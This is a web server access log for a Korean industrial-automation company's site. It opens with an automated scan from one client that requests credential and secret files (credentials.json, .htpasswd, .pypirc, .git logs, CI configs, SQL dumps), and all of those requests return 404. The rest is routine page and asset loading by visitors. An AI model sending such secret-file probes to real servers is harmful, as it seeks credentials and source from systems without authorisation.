-[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/credentials.json" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.gitconfig" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.pypirc" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.htpasswd" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.json" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web.config" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/configuration.php" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/logs/HEAD" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/logs/refs/heads/master" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/logs/refs/heads/main" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.github/workflows/main.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.github/workflows/ci.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.github/workflows/deploy.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.gitlab-ci.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/bitbucket-pipelines.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.travis.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:45:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/docker-compose.yml" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/composer.json" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.svn/entries" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.svn/wc.db" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.htaccess" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:46:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup.sql" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:16:46:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dump.sql" [Client 195.178.110.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" -[18/Feb/2026:20:31:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/traffic-advice" [Client 66.249.82.64] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Chrome Privacy Preserving Prefetch Proxy" "-" -[18/Feb/2026:20:31:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 193.186.4.174] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:20:34:25 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:33:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] 